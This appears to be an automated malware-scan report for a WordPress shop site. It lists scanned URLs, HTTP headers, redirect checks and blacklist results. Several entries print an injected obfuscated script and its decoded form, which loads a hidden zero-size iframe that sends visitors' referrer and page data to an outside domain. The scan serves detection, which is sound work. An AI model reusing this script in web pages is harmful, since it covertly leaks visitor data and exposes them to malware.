Scanned pages/files
Request | Server response | Status |
http://wolfhardt.com/ | 200 OK Content-Length: 37103 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); | ||
http://wolfhardt.com/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 95977 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-content/themes/room09_2/theme/assets/js/jquery.commonlibraries.js | 200 OK Content-Length: 75021 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-content/themes/room09_2/core/assets/js/jquery.placeholder.js | 200 OK Content-Length: 1709 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-content/themes/room09_2/theme/assets/js/yit/jquery.layout.js | 200 OK Content-Length: 4587 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-content/themes/room09_2/js/jquery.custom.js | 200 OK Content-Length: 4880 Content-Type: application/javascript | clean |
http://wolfhardt.com//wolfhardt.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Sep 2015 18:11:24 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js/ Server: - Web acceleration by http://www.unixy.net/varnish Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Cacheable: YES X-Pingback: http://wolfhardt.com/xmlrpc.php X-Powered-By: PHP/5.3.28 X-Varnish: 1997965355 | clean |
http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockui.min.js/ | 404 Not Found Content-Length: 29547 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Same encoded script and decoded script as listed for http://wolfhardt.com/ above. | ||
http://wolfhardt.com//wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Sep 2015 18:11:25 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js/ Server: - Web acceleration by http://www.unixy.net/varnish Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Cacheable: YES X-Pingback: http://wolfhardt.com/xmlrpc.php X-Powered-By: PHP/5.3.28 X-Varnish: 1997965369 | clean |
http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js/ | 404 Not Found Content-Length: 29529 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Same encoded script and decoded script as listed for http://wolfhardt.com/ above. | ||
http://wolfhardt.com/wp-content/themes/room09_2/core/assets/js/jq-cookie.js | 200 OK Content-Length: 679 Content-Type: application/javascript | clean |
http://wolfhardt.com//wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Sep 2015 18:11:27 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js/ Server: - Web acceleration by http://www.unixy.net/varnish Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Cacheable: YES X-Pingback: http://wolfhardt.com/xmlrpc.php X-Powered-By: PHP/5.3.28 X-Varnish: 1997965376 | clean |
http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js/ | 404 Not Found Content-Length: 29535 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Same encoded script and decoded script as listed for http://wolfhardt.com/ above. | ||
http://wolfhardt.com/wp-content/plugins/yith-woocommerce-compare/assets/js/woocompare.js | 200 OK Content-Length: 8741 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-content/plugins/yith-woocommerce-compare/assets/js/jquery.colorbox-min.js | 200 OK Content-Length: 11825 Content-Type: application/javascript | clean |
http://wolfhardt.com//wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyPhoto/jquery.prettyPhoto.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Sep 2015 18:11:28 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyPhoto/jquery.prettyPhoto.min.js/ Server: - Web acceleration by http://www.unixy.net/varnish Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Cacheable: YES X-Pingback: http://wolfhardt.com/xmlrpc.php X-Powered-By: PHP/5.3.28 X-Varnish: 1997965386 | clean |
http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyphoto/jquery.prettyphoto.min.js/ | 404 Not Found Content-Length: 29549 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Same encoded script and decoded script as listed for http://wolfhardt.com/ above. | ||
http://wolfhardt.com//wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyPhoto/jquery.prettyPhoto.init.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Sep 2015 18:11:29 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyPhoto/jquery.prettyPhoto.init.min.js/ Server: - Web acceleration by http://www.unixy.net/varnish Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Cacheable: YES X-Pingback: http://wolfhardt.com/xmlrpc.php X-Powered-By: PHP/5.3.28 X-Varnish: 1997965391 | clean |
http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyphoto/jquery.prettyphoto.init.min.js/ | 404 Not Found Content-Length: 29559 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Same encoded script and decoded script as listed for http://wolfhardt.com/ above. |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wolfhardt.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Sep 2015 18:11:21 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Server: - Web acceleration by http://www.unixy.net/varnish
Vary: Accept-Encoding,User-Agent
Content-Length: 37103
Content-Type: text/html; charset=UTF-8
Link: <http://wolfhardt.com/>; rel=shortlink
X-Cache: HIT
X-Cache-Hits: 1
X-Cacheable: YES
X-Pingback: http://wolfhardt.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
X-Varnish: 1997965283 1997965281
...37103 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wolfhardt.com
Referer: http://www.google.com/search?q=wolfhardt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wolfhardt.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wolfhardt.com/
Result: wolfhardt.com is not infected or malware details are not published yet.